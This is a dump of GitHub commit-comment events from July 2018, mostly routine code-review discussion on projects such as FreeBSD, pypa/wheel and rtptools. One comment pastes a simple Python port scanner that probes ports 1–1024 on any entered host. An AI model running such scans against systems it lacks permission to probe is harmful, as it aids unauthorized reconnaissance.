{"id":"7983195983","type":"CommitCommentEvent","actor":{"login":"yotsuba1022"},"repo":{"name":"ChengIrene/fujyosi-diary"},"payload":{"comment":{"id":29750229,"position":null,"line":null,"path":null,"commit_id":"ca63b185516dfb1a84ad727409e0b80c4c8ea558","created_at":"2018-07-18T14:06:07Z","updated_at":"2018-07-18T14:06:07Z","author_association":"NONE","body":"💯"}},"created_at":"2018-07-18T14:06:07Z"}
{"id":"7983196560","type":"CommitCommentEvent","actor":{"login":"ennchyko"},"repo":{"name":"ennchyko/cicd-pipeline-train-schedule-cd"},"payload":{"comment":{"id":29750231,"position":null,"line":null,"path":null,"commit_id":"92129a7c5b9e4e7bef1e91d9d4ae1e4e85574979","created_at":"2018-07-18T14:06:12Z","updated_at":"2018-07-18T14:06:12Z","author_association":"OWNER","body":"back to a working version"}},"created_at":"2018-07-18T14:06:12Z"}
{"id":"7983196614","type":"CommitCommentEvent","actor":{"login":"AnnaGuilger"},"repo":{"name":"AnnaGuilger/curso-javascript-ninja"},"payload":{"comment":{"id":29750232,"position":26,"line":26,"path":"challenge-01/README.md","commit_id":"d2134407a36be35be83cde67758afebef555ad0e","created_at":"2018-07-18T14:06:12Z","updated_at":"2018-07-18T14:06:12Z","author_association":"OWNER","body":"var comida = ['arroz','feijão','ovo'];"}},"created_at":"2018-07-18T14:06:12Z"}
{"id":"7983198795","type":"CommitCommentEvent","actor":{"login":"szymczdm"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29750236,"position":16,"line":62,"path":"code/drasil-docLang/Drasil/DocumentLanguage/Definitions.hs","commit_id":"1ac44586e3088e138c4bed83f1f5fa2bf385372b","created_at":"2018-07-18T14:06:31Z","updated_at":"2018-07-18T14:06:31Z","author_association":"COLLABORATOR","body":"> The hardcoded ++ \"LC\" was a way of simplifying the process of making a uid for the LabelledContent.\r\n\r\nIf we keep it, then I'd move that \"LC\" out to somewhere in Data and import it. We don't want hard-coded labels like that.\r\n\r\n> Should LabelledContents built off of each GenDefn not have their own uid? I can update it to use the uid of the GenDefn but I thought that each \"chunk\" instance in Drasil needs to be unique?\r\n\r\nIt really depends if it is actually saying something new. We have many instances of chunks that are built off previously existing chunks where the uid is the same since we're essentially just adding previously unknown information. These chunks are \"the same\" to the back-end and can be used for looking up relevant information (like the symbol). Whether that's a good design or not is another issue (I think it's a problem as we should encode data once, but that can be dealt with later through various changes to constructors)."}},"created_at":"2018-07-18T14:06:31Z"}
{"id":"7983204651","type":"CommitCommentEvent","actor":{"login":"Domo929"},"repo":{"name":"ilpincy/blabbermouth"},"payload":{"comment":{"id":29750246,"position":null,"line":null,"path":null,"commit_id":"84c44849b03d5bd7d2624b76323fe7540434f8fd","created_at":"2018-07-18T14:07:27Z","updated_at":"2018-07-18T14:07:27Z","author_association":"NONE","body":"Do you ever sleep......."}},"created_at":"2018-07-18T14:07:27Z"}
{"id":"7983206943","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"Zhikh/NET.S.2018.Zhikh.09"},"payload":{"comment":{"id":29750252,"position":29,"line":28,"path":"Task1/Logic.Task1/Sorter.cs","commit_id":"6a6cfb575cbd8262bc6a4ad1b393a941d6cbf478","created_at":"2018-07-18T14:07:49Z","updated_at":"2018-07-18T14:07:49Z","author_association":"NONE","body":"будет чище код, если цикл for заменить while, поcкольку оценка значения i в этом случае не имеет смысла"}},"created_at":"2018-07-18T14:07:49Z"}
{"id":"7983207005","type":"CommitCommentEvent","actor":{"login":"royger"},"repo":{"name":"prati0100/freebsd"},"payload":{"comment":{"id":29750253,"position":38,"line":38,"path":"sys/xen/busdma_xen.h","commit_id":"940253057069fef06bda18f9208a85893ee9e359","created_at":"2018-07-18T14:07:50Z","updated_at":"2018-07-18T14:07:50Z","author_association":"NONE","body":"Er, there seems to be a flags clash here. Bit 16 seems to be used to signal RO grants, but then it's also used to pass the domid?\r\n\r\nI guess they are used by different helpers, so maybe it would make sense to add a comment that explains to which function call each flag belongs.\r\n\r\nAlso this should be:\r\n\r\n#define BUS_DMA_XEN_DOMID_SHIFT 16\r\n\r\nThere's no need for the 'u' or the parentheses AFAICT."}},"created_at":"2018-07-18T14:07:50Z"}
{"id":"7983207892","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"Zhikh/NET.S.2018.Zhikh.09"},"payload":{"comment":{"id":29750254,"position":47,"line":44,"path":"Task1/Logic.Task1/Sorter.cs","commit_id":"6a6cfb575cbd8262bc6a4ad1b393a941d6cbf478","created_at":"2018-07-18T14:07:58Z","updated_at":"2018-07-18T14:07:58Z","author_association":"NONE","body":"убрать\r\n"}},"created_at":"2018-07-18T14:07:58Z"}
{"id":"7983208537","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"Zhikh/NET.S.2018.Zhikh.09"},"payload":{"comment":{"id":29750255,"position":62,"line":59,"path":"Task1/Logic.Task1/Sorter.cs","commit_id":"6a6cfb575cbd8262bc6a4ad1b393a941d6cbf478","created_at":"2018-07-18T14:08:05Z","updated_at":"2018-07-18T14:08:05Z","author_association":"NONE","body":"убрать"}},"created_at":"2018-07-18T14:08:05Z"}
{"id":"7983209596","type":"CommitCommentEvent","actor":{"login":"wimglenn"},"repo":{"name":"pypa/wheel"},"payload":{"comment":{"id":29750258,"position":39,"line":82,"path":"wheel/metadata.py","commit_id":"f3855494f20724f1ae844631d08e34367e977661","created_at":"2018-07-18T14:08:15Z","updated_at":"2018-07-18T14:08:15Z","author_association":"CONTRIBUTOR","body":"@agronholm  This code causes new issues. You should not use `if (key, value) not in pkg_info.items()` for a couple of reasons. Firstly, regenerating the entire list of items for each check is suboptimal, but more importantly: the key lookup in `pkg_info` is supposed to be case-insensitive (the PEP specifies that the original key-value format should be read with `email.parser.HeaderParser`, which is case-insensitive). If you look up in `pkg_info.items()` you cause it to be case-sensitive.\r\n\r\nBetter would be:\r\n\r\n    if value not in pkg_info.get_all(key, []):\r\n"}},"created_at":"2018-07-18T14:08:15Z"}
{"id":"7983210483","type":"CommitCommentEvent","actor":{"login":"Wolfkid200444"},"repo":{"name":"ImpladeDeveloped/Implactor"},"payload":{"comment":{"id":29750261,"position":null,"line":null,"path":null,"commit_id":"6507bb8647253a527b4b43a03b5ec815b4904696","created_at":"2018-07-18T14:08:24Z","updated_at":"2018-07-18T14:08:24Z","author_association":"NONE","body":"i dont need to be a JS Coder to code php i was a php coder too you ~~dummass~~"}},"created_at":"2018-07-18T14:08:24Z"}
{"id":"7983210823","type":"CommitCommentEvent","actor":{"login":"vgi900"},"repo":{"name":"vgi900/data"},"payload":{"comment":{"id":29750262,"position":1,"line":1,"path":"README.md","commit_id":"f819c06a1c723548500d9e6bc296e87b40de19b0","created_at":"2018-07-18T14:08:28Z","updated_at":"2018-07-18T14:08:28Z","author_association":"OWNER","body":"# Import the modules\r\nimport sys\r\nimport random\r\n\r\nans = True\r\n\r\nwhile ans:\r\n    question = raw_input(\"Ask the magic 8 ball a question: (press enter to quit) \")\r\n    \r\n    answers = random.randint(1,8)\r\n    \r\n    if question == \"\":\r\n        sys.exit()\r\n    \r\n    elif answers == 1:\r\n        print \"It is certain\"\r\n    \r\n    elif answers == 2:\r\n        print \"Outlook good\"\r\n    \r\n    elif answers == 3:\r\n        print \"You may rely on it\"\r\n    \r\n    elif answers == 4:\r\n        print \"Ask again later\"\r\n    \r\n    elif answers == 5:\r\n        print \"Concentrate and ask again\"\r\n    \r\n    elif answers == 6:\r\n        print \"Reply hazy, try again\"\r\n    \r\n    elif answers == 7:\r\n        print \"My reply is no\"\r\n    \r\n    elif answers == 8:\r\n        print \"My sources say no\""}},"created_at":"2018-07-18T14:08:28Z"}
{"id":"7983211243","type":"CommitCommentEvent","actor":{"login":"Wolfkid200444"},"repo":{"name":"ImpladeDeveloped/Implactor"},"payload":{"comment":{"id":29750263,"position":null,"line":null,"path":null,"commit_id":"6507bb8647253a527b4b43a03b5ec815b4904696","created_at":"2018-07-18T14:08:32Z","updated_at":"2018-07-18T14:08:32Z","author_association":"NONE","body":"im jk"}},"created_at":"2018-07-18T14:08:32Z"}
{"id":"7983211333","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29750265,"position":null,"line":null,"path":null,"commit_id":"e9a2253c79a0c934e9febefd3d1597a036148baa","created_at":"2018-07-18T14:08:33Z","updated_at":"2018-07-18T14:08:33Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#ci-413](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#ci-413).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-413-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-18T14:08:33Z"}
{"id":"7983212906","type":"CommitCommentEvent","actor":{"login":"royger"},"repo":{"name":"prati0100/freebsd"},"payload":{"comment":{"id":29750272,"position":758,"line":758,"path":"sys/x86/xen/busdma_xen.c","commit_id":"940253057069fef06bda18f9208a85893ee9e359","created_at":"2018-07-18T14:08:47Z","updated_at":"2018-07-18T14:08:47Z","author_association":"NONE","body":"I don't see this being used outside of this file, so it should be declared as static."}},"created_at":"2018-07-18T14:08:47Z"}
{"id":"7983214654","type":"CommitCommentEvent","actor":{"login":"mcd500"},"repo":{"name":"columbia-irt/rtptools"},"payload":{"comment":{"id":29750278,"position":null,"line":null,"path":null,"commit_id":"b362334560dc1020fddd44587f7a9be189da7d8a","created_at":"2018-07-18T14:09:05Z","updated_at":"2018-07-18T14:09:05Z","author_association":"CONTRIBUTOR","body":"Oh, the value of variable `start` in the header was not read from the file and was written to the file, so this is the reason I revised the code to read the value of `start`  from the file.\r\nThis was the code in rtpdump.c.\r\n~~~\r\nstruct timeval start;\r\n  /* if no optional arguments, we are reading from a file */\r\n  if (optind == argc) {\r\n    source = FromFile;\r\n    sock[0] = fileno(in);  /* stdin */\r\n    sock[1] = -1;          /* not used */\r\n    memset(&sin, 0, sizeof(struct sockaddr_in));\r\n    RD_header(in, &sin, 0);\r\n    dstart = 0.;\r\n  } \r\n  else {\r\n    source = FromNetwork;\r\n    if (hpt(argv[optind], &sin, NULL) == -1) {\r\n      usage(argv[0]);\r\n      exit(1);\r\n    }\r\n    rtp = sin;\r\n    nfds = open_network(argv[optind], format != F_rtcp, sock, &sin);\r\n    gettimeofday(&start, 0);\r\n    dstart = tdbl(&start);\r\n}\r\n~~~\r\nIn the above code, before the `else` statement in `if` is the portion of reading from the file but the original code did not read the value of the 'start' from the file. \r\nThe value of the variable `start` will be undefined value.  The value could vary depending on the compiler.\r\nAnd next code is directly writing the unknown value of `start` to the file.\r\n~~~\r\n/* write header for dump file */\r\nif (format == F_dump || format == F_header)\r\n  rtpdump_header(out, &rtp, &start);\r\n~~~\r\nIf the rtpdump is reading the data from network then after the `else` is executed and the `gettimeofday(&start, 0);` will set the value of the `start`, so it is OK.\r\nI was concerned of rtpdump is getting the data from the file.\r\n\r\nMy real motivation was to add test in `make check` something similar to \r\n~~~\r\n./rtpdump ?F dump < bark.rtp > a.rtp\r\n./rtpdump ?F dump < a.rtp > b.rtp\r\ndiff a.rtp b.rtp || exit 1\r\n~~~\r\nto compare the binaries whether it will match or not.\r\nBefore this patch, the 'diff a.rtp b.rtp' could fail since the content of variable 'start' could be anything.\r\nThe compiler in Visual Studio was putting random number in the 'struct timeval start;'.\r\nAlso I personally was not feeling comfortable when the uninitialized variable is used in the code. I have not checked the other portion in the rtptools but this is the one I found coincidentally when I was trying to fix some of the warnings during build.\r\n\r\n"}},"created_at":"2018-07-18T14:09:05Z"}
{"id":"7983215405","type":"CommitCommentEvent","actor":{"login":"crettazminaglia"},"repo":{"name":"EcoRProg/OpenSciRProg"},"payload":{"comment":{"id":29750279,"position":null,"line":null,"path":null,"commit_id":"f70597e0c3a0f3bed248cc87101a44fa55d239cd","created_at":"2018-07-18T14:09:12Z","updated_at":"2018-07-18T14:09:12Z","author_association":"COLLABORATOR","body":"\r\n\r\nOk"}},"created_at":"2018-07-18T14:09:12Z"}
{"id":"7983216734","type":"CommitCommentEvent","actor":{"login":"royger"},"repo":{"name":"prati0100/freebsd"},"payload":{"comment":{"id":29750287,"position":100,"line":100,"path":"sys/x86/xen/busdma_xen.c","commit_id":"940253057069fef06bda18f9208a85893ee9e359","created_at":"2018-07-18T14:09:24Z","updated_at":"2018-07-18T14:09:24Z","author_association":"NONE","body":"Can you reorder the function so that you don't need this forward declaration?"}},"created_at":"2018-07-18T14:09:24Z"}
{"id":"7983216765","type":"CommitCommentEvent","actor":{"login":"ilpincy"},"repo":{"name":"ilpincy/blabbermouth"},"payload":{"comment":{"id":29750288,"position":null,"line":null,"path":null,"commit_id":"84c44849b03d5bd7d2624b76323fe7540434f8fd","created_at":"2018-07-18T14:09:24Z","updated_at":"2018-07-18T14:09:24Z","author_association":"OWNER","body":"Every Saturday\n\nCheers,\nCarlo\n\n--\nCarlo Pinciroli, PhD\nhttp://carlo.pinciroli.net/\n\nOn Wed, Jul 18, 2018, 10:07 Dominic Cupo <notifications@github.com> wrote:\n\n> Do you ever sleep.......\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/ilpincy/blabbermouth/commit/84c44849b03d5bd7d2624b76323fe7540434f8fd#commitcomment-29750246>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ACmZY_MSIPsLhQ7QZDxGLPg0APuJrO-6ks5uH0EggaJpZM4VUqwi>\n> .\n>\n"}},"created_at":"2018-07-18T14:09:24Z"}
{"id":"7983216854","type":"CommitCommentEvent","actor":{"login":"pavanblore11"},"repo":{"name":"pavanblore11/SFDCGITHUBDemo"},"payload":{"comment":{"id":29750289,"position":null,"line":null,"path":null,"commit_id":"624f169fc4b25c3c113c65eb356118de29528a5d","created_at":"2018-07-18T14:09:25Z","updated_at":"2018-07-18T14:09:25Z","author_association":"OWNER","body":"new commit"}},"created_at":"2018-07-18T14:09:25Z"}
{"id":"7983219225","type":"CommitCommentEvent","actor":{"login":"vgi900"},"repo":{"name":"vgi900/data"},"payload":{"comment":{"id":29750296,"position":2,"line":2,"path":"README.md","commit_id":"f819c06a1c723548500d9e6bc296e87b40de19b0","created_at":"2018-07-18T14:09:48Z","updated_at":"2018-07-18T14:09:48Z","author_association":"OWNER","body":"\r\nsock = socket.socket (socket_family, socket_type)\r\nSyntax for creating a socket\r\n\r\nsock = socket.socket (socket.AF_INET, socket.SOCK_STREAM)\r\nCreates a stream socket\r\n\r\nAF_INET\r\nSocket Family (here Address Family version 4 or IPv4)\r\n\r\nSOCK_STREAM\r\nSocket type TCP connections\r\n\r\nSOCK_DGRAM\r\nSocket type UDP connections\r\n\r\ngethostbyname(\"host\")\r\nTranslate a host name to IPv4 address format\r\n\r\nsocket.gethostbyname_ex(\"host\")\r\nTranslate a host name to IPv4 address format, extended interface\r\n\r\nsocket.getfqdn(\"8.8.8.8\")\r\nGet the fqdn (fully qualified domain name)\r\n\r\nsocket.gethostname()\r\nReturns the hostname of the machine..\r\n\r\nsocket.error\r\nException handling\r\nMaking a program using Python Sockets\r\nHow to make a simple port scanner program in Python\r\n\r\nThis small port scanner program will try to connect on every port you define for\r\na particular host. \r\n\r\nThe first thing we must do is import the socket library and other libraries that\r\nwe need. \r\n\r\nOpen up an text editor, copy & paste the code below. Save the file as:\r\n\"portscanner.py\" and exit the editor\r\n#!/usr/bin/env python\r\nimport socket\r\nimport subprocess\r\nimport sys\r\nfrom datetime import datetime\r\n\r\n# Clear the screen\r\nsubprocess.call('clear', shell=True)\r\n\r\n# Ask for input\r\nremoteServer    = raw_input(\"Enter a remote host to scan: \")\r\nremoteServerIP  = socket.gethostbyname(remoteServer)\r\n\r\n# Print a nice banner with information on which host we are about to scan\r\nprint \"-\" * 60\r\nprint \"Please wait, scanning remote host\", remoteServerIP\r\nprint \"-\" * 60\r\n\r\n# Check what time the scan started\r\nt1 = datetime.now()\r\n\r\n# Using the range function to specify ports (here it will scans all ports between 1 and 1024)\r\n\r\n# We also put in some error handling for catching errors\r\n\r\ntry:\r\n    for port in range(1,1025):  \r\n        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n        result = sock.connect_ex((remoteServerIP, port))\r\n        if result == 0:\r\n            print \"Port {}: \t Open\".format(port)\r\n        sock.close()\r\n\r\nexcept KeyboardInterrupt:\r\n    print \"You pressed Ctrl+C\"\r\n    sys.exit()\r\n\r\nexcept socket.gaierror:\r\n    print 'Hostname could not be resolved. Exiting'\r\n    sys.exit()\r\n\r\nexcept socket.error:\r\n    print \"Couldn't connect to server\"\r\n    sys.exit()\r\n\r\n# Checking the time again\r\nt2 = datetime.now()\r\n\r\n# Calculates the difference of time, to see how long it took to run the script\r\ntotal =  t2 - t1\r\n\r\n# Printing the information to screen\r\nprint 'Scanning Completed in: ', total"}},"created_at":"2018-07-18T14:09:48Z"}
{"id":"7983219792","type":"CommitCommentEvent","actor":{"login":"browner12"},"repo":{"name":"laravel/framework"},"payload":{"comment":{"id":29750298,"position":null,"line":null,"path":null,"commit_id":"57d7b1fef9fa48899b99dd240d89a2ef4cbafc4b","created_at":"2018-07-18T14:09:54Z","updated_at":"2018-07-18T14:09:54Z","author_association":"CONTRIBUTOR","body":"you code *should not* be affected by this change, because we normalize everything to an array when it comes in. I'm digging into this right now"}},"created_at":"2018-07-18T14:09:54Z"}
{"id":"7983219822","type":"CommitCommentEvent","actor":{"login":"HeadJar"},"repo":{"name":"O365/python-o365"},"payload":{"comment":{"id":29750299,"position":null,"line":null,"path":null,"commit_id":"9ef36981167a428de8474891e818f4f4fb7e42cd","created_at":"2018-07-18T14:09:54Z","updated_at":"2018-07-18T14:09:54Z","author_association":"NONE","body":"Hello, I was wondering if there was some documentation on pulling and saving attachments from outlook. "}},"created_at":"2018-07-18T14:09:54Z"}
{"id":"7983220966","type":"CommitCommentEvent","actor":{"login":"AbhishekGhosh"},"repo":{"name":"AbhishekGhosh/LedBlinkLib"},"payload":{"comment":{"id":29750301,"position":null,"line":null,"path":null,"commit_id":"028b411f2a41a2eb62abbc42cb5ed67b5956bcda","created_at":"2018-07-18T14:10:06Z","updated_at":"2018-07-18T14:10:06Z","author_association":"OWNER","body":"Thanks!"}},"created_at":"2018-07-18T14:10:06Z"}
{"id":"7983223604","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"Zhikh/NET.S.2018.Zhikh.09"},"payload":{"comment":{"id":29750305,"position":14,"line":14,"path":"Task1/Logic.Task1.Tests/SorterTests.cs","commit_id":"323ff91425d421ec2b090183417ed595ec235479","created_at":"2018-07-18T14:10:30Z","updated_at":"2018-07-18T14:10:30Z","author_association":"NONE","body":"тестов много и хорошие, но нет тестов с null-ами, как элементами jagged array"}},"created_at":"2018-07-18T14:10:30Z"}
{"id":"7983223923","type":"CommitCommentEvent","actor":{"login":"royger"},"repo":{"name":"prati0100/freebsd"},"payload":{"comment":{"id":29750307,"position":72,"line":72,"path":"sys/x86/xen/busdma_xen.c","commit_id":"940253057069fef06bda18f9208a85893ee9e359","created_at":"2018-07-18T14:10:33Z","updated_at":"2018-07-18T14:10:33Z","author_association":"NONE","body":"You don't need this type, you can just declare it inside the load_op struct:\r\n\r\nstruct load_op {\r\n    enum {\r\n        LOAD_MA,\r\n        ..."}},"created_at":"2018-07-18T14:10:33Z"}
{"id":"7983224905","type":"CommitCommentEvent","actor":{"login":"vgi900"},"repo":{"name":"vgi900/data"},"payload":{"comment":{"id":29750309,"position":null,"line":null,"path":null,"commit_id":"f819c06a1c723548500d9e6bc296e87b40de19b0","created_at":"2018-07-18T14:10:43Z","updated_at":"2018-07-18T14:10:43Z","author_association":"OWNER","body":"import random\r\nmin = 1\r\nmax = 6\r\n\r\nroll_again = \"yes\"\r\n\r\nwhile roll_again == \"yes\" or roll_again == \"y\":\r\n    print \"Rolling the dices...\"\r\n    print \"The values are....\"\r\n    print random.randint(min, max)\r\n    print random.randint(min, max)\r\n\r\n    roll_again = raw_input(\"Roll the dices again?\")"}},"created_at":"2018-07-18T14:10:43Z"}
{"id":"7983231925","type":"CommitCommentEvent","actor":{"login":"royger"},"repo":{"name":"prati0100/freebsd"},"payload":{"comment":{"id":29750320,"position":69,"line":69,"path":"sys/x86/xen/busdma_xen.c","commit_id":"940253057069fef06bda18f9208a85893ee9e359","created_at":"2018-07-18T14:11:49Z","updated_at":"2018-07-18T14:11:49Z","author_association":"NONE","body":"If it's a flags field as the name suggest it should be unsigned int."}},"created_at":"2018-07-18T14:11:49Z"}
{"id":"7983233690","type":"CommitCommentEvent","actor":{"login":"prati0100"},"repo":{"name":"prati0100/freebsd"},"payload":{"comment":{"id":29750323,"position":38,"line":38,"path":"sys/xen/busdma_xen.h","commit_id":"940253057069fef06bda18f9208a85893ee9e359","created_at":"2018-07-18T14:12:06Z","updated_at":"2018-07-18T14:12:06Z","author_association":"OWNER","body":"All right, I'll fix it."}},"created_at":"2018-07-18T14:12:06Z"}
{"id":"7983234090","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29750324,"position":null,"line":null,"path":null,"commit_id":"c83f70402fb5a6d90ac26e79fb9304f6803eef68","created_at":"2018-07-18T14:12:10Z","updated_at":"2018-07-18T14:12:10Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#ci-414](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#ci-414).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-414-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-18T14:12:10Z"}
{"id":"7983238469","type":"CommitCommentEvent","actor":{"login":"ksooo"},"repo":{"name":"palinek/pvr.sledovanitv.cz"},"payload":{"comment":{"id":29750330,"position":null,"line":null,"path":null,"commit_id":"0f46e1e9703ff9f3ebbe46a0042c51e626f052b8","created_at":"2018-07-18T14:12:52Z","updated_at":"2018-07-18T14:12:52Z","author_association":"COLLABORATOR","body":"It worked. Thanks."}},"created_at":"2018-07-18T14:12:52Z"}
{"id":"7983246433","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"mrobaczyk/Stockfish"},"payload":{"comment":{"id":29750346,"position":null,"line":null,"path":null,"commit_id":"2461c11c780e75b83c332025951855a7cd2dfd65","created_at":"2018-07-18T14:14:07Z","updated_at":"2018-07-18T14:14:07Z","author_association":"NONE","body":"@mrobaczyk \r\nC configs how fare different tested versions of a parameter during an iteration. Par example say C=10 and\r\nthe current best parameter value would x=20. Then in the current iteration two version of the tuning branch pitted against each other in a little match (games = 2 * cores of worker) to measure the performance. On version uses parameter x=20-C=10 and the other x=20+C=30. According to the match result the parameter is now adjusted up or down.\r\n\r\nIf you enter your parameter description in the submitting you find in the 5th column the C value for each parameter. Simply change it there (par example half values) and submit."}},"created_at":"2018-07-18T14:14:07Z"}
{"id":"7983247224","type":"CommitCommentEvent","actor":{"login":"royger"},"repo":{"name":"prati0100/freebsd"},"payload":{"comment":{"id":29750347,"position":129,"line":129,"path":"sys/x86/xen/busdma_xen.c","commit_id":"940253057069fef06bda18f9208a85893ee9e359","created_at":"2018-07-18T14:14:14Z","updated_at":"2018-07-18T14:14:14Z","author_association":"NONE","body":"This should be '} else {'"}},"created_at":"2018-07-18T14:14:14Z"}
{"id":"7983248885","type":"CommitCommentEvent","actor":{"login":"redstonemcgamer"},"repo":{"name":"redstonemcgamer/vivian-bot"},"payload":{"comment":{"id":29750348,"position":3,"line":3,"path":"config.js","commit_id":"9c120e501e83f9345c18bd73ce1df750469fa11c","created_at":"2018-07-18T14:14:29Z","updated_at":"2018-07-18T14:14:29Z","author_association":"OWNER","body":"d"}},"created_at":"2018-07-18T14:14:29Z"}
{"id":"7983252744","type":"CommitCommentEvent","actor":{"login":"maktan38"},"repo":{"name":"minershive/hiveos-linux"},"payload":{"comment":{"id":29750361,"position":null,"line":null,"path":null,"commit_id":"82ccb0fce8d01d0a95641aa945ee969c2ffc9e9a","created_at":"2018-07-18T14:15:07Z","updated_at":"2018-07-18T14:15:07Z","author_association":"NONE","body":"Hello HaloGenius\r\nI have a few questions\r\nHow can I upgrade this version from 2.4.5 to 2.4.7 on hiveos\r\nand I want to downgrade amd driver from 18.10 to 17.50, Because more hashrate amd pro 17.50 from 18.50\r\nThank you\r\nSorry my English\r\n"}},"created_at":"2018-07-18T14:15:07Z"}
{"id":"7983252890","type":"CommitCommentEvent","actor":{"login":"expert975"},"repo":{"name":"ciber96/mtabg"},"payload":{"comment":{"id":29750363,"position":7,"line":28,"path":"battlegrounds/lang/sUpdateSpreadsheet.lua","commit_id":"0730411906002e17747249f2702b85ca338a2a22","created_at":"2018-07-18T14:15:08Z","updated_at":"2018-07-18T14:15:08Z","author_association":"COLLABORATOR","body":"My keyboard sucks, better get used to it."}},"created_at":"2018-07-18T14:15:08Z"}
{"id":"7983254653","type":"CommitCommentEvent","actor":{"login":"prati0100"},"repo":{"name":"prati0100/freebsd"},"payload":{"comment":{"id":29750372,"position":100,"line":100,"path":"sys/x86/xen/busdma_xen.c","commit_id":"940253057069fef06bda18f9208a85893ee9e359","created_at":"2018-07-18T14:15:23Z","updated_at":"2018-07-18T14:15:23Z","author_association":"OWNER","body":"It's not a function, its the impl struct that is used to hold the function pointers of the busdma functions.\r\n\r\nThis struct is used in `xen_bus_dma_tag_create()`, but it's definition needs all the static functions. So I don't think it can be reordered.\r\n\r\nI'll declare it as static though, like you suggested"}},"created_at":"2018-07-18T14:15:23Z"}
{"id":"7983258584","type":"CommitCommentEvent","actor":{"login":"Hains"},"repo":{"name":"PLi-metas/meta-dream"},"payload":{"comment":{"id":29750393,"position":null,"line":null,"path":null,"commit_id":"868e864833603bec38967baf4c6c473becdb77b9","created_at":"2018-07-18T14:16:00Z","updated_at":"2018-07-18T14:16:00Z","author_association":"MEMBER","body":"I mean a ' MACHINE=dm7020hdv2 make image/feed'  after a bitbake -recipe name- to be sure\r\nthe dm7020hdv2 image have the latest update.\r\n\r\nIt's a small side-effect of this construction, but if you know it, It's almost perfect.\r\nThis construction save disc space and compile time."}},"created_at":"2018-07-18T14:16:00Z"}
{"id":"7983260696","type":"CommitCommentEvent","actor":{"login":"udalov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29750397,"position":10,"line":52,"path":"compiler/frontend/src/org/jetbrains/kotlin/resolve/lazy/FileScopeFactory.kt","commit_id":"acede8b1efb020bae97d3fd1895f5689d104fa10","created_at":"2018-07-18T14:16:19Z","updated_at":"2018-07-18T14:16:19Z","author_association":"MEMBER","body":"Maybe `storageManager.createLazyValue` is not needed anymore here?\r\n\r\nEither way, the comment is outdated"}},"created_at":"2018-07-18T14:16:19Z"}
{"id":"7983261350","type":"CommitCommentEvent","actor":{"login":"Sanduhr32"},"repo":{"name":"DuncteBot/SkyBot"},"payload":{"comment":{"id":29750398,"position":null,"line":null,"path":null,"commit_id":"fe5c8595d1063824f122e1622c9ce54731666b6b","created_at":"2018-07-18T14:16:25Z","updated_at":"2018-07-18T14:16:25Z","author_association":"MEMBER","body":"Did you change my logger? I got it working after 1 hour of trying!"}},"created_at":"2018-07-18T14:16:25Z"}
{"id":"7983263063","type":"CommitCommentEvent","actor":{"login":"1484"},"repo":{"name":"ntt-developers/ntt-tech-conference"},"payload":{"comment":{"id":29750400,"position":null,"line":null,"path":null,"commit_id":"d32761c787b8e0239237d2b13c81f2b63202269b","created_at":"2018-07-18T14:16:40Z","updated_at":"2018-07-18T14:16:40Z","author_association":"NONE","body":"とりあえず必要そうと思われる情報を書いてみました。\r\nデザインは...センスある人お願い orz"}},"created_at":"2018-07-18T14:16:40Z"}
{"id":"7983263244","type":"CommitCommentEvent","actor":{"login":"ManigandanRaamanathan"},"repo":{"name":"frederikbosch/ace"},"payload":{"comment":{"id":29750401,"position":null,"line":null,"path":null,"commit_id":"ce45fbed77cb45f03355820bdc5bffd869a9f7a2","created_at":"2018-07-18T14:16:42Z","updated_at":"2018-07-18T14:16:42Z","author_association":"NONE","body":"With these latest changes, is this plugin works fine?"}},"created_at":"2018-07-18T14:16:42Z"}
{"id":"7983263264","type":"CommitCommentEvent","actor":{"login":"AnnaGuilger"},"repo":{"name":"AnnaGuilger/curso-javascript-ninja"},"payload":{"comment":{"id":29750402,"position":29,"line":29,"path":"challenge-01/README.md","commit_id":"d2134407a36be35be83cde67758afebef555ad0e","created_at":"2018-07-18T14:16:42Z","updated_at":"2018-07-18T14:16:42Z","author_association":"OWNER","body":"comida = [1]"}},"created_at":"2018-07-18T14:16:42Z"}
{"id":"7983267823","type":"CommitCommentEvent","actor":{"login":"shgupta01"},"repo":{"name":"shgupta01/Test01"},"payload":{"comment":{"id":29750407,"position":null,"line":null,"path":null,"commit_id":"4125debf2498c8230a005dce759aee8d4d23f785","created_at":"2018-07-18T14:17:28Z","updated_at":"2018-07-18T14:17:28Z","author_association":"OWNER","body":"s"}},"created_at":"2018-07-18T14:17:28Z"}
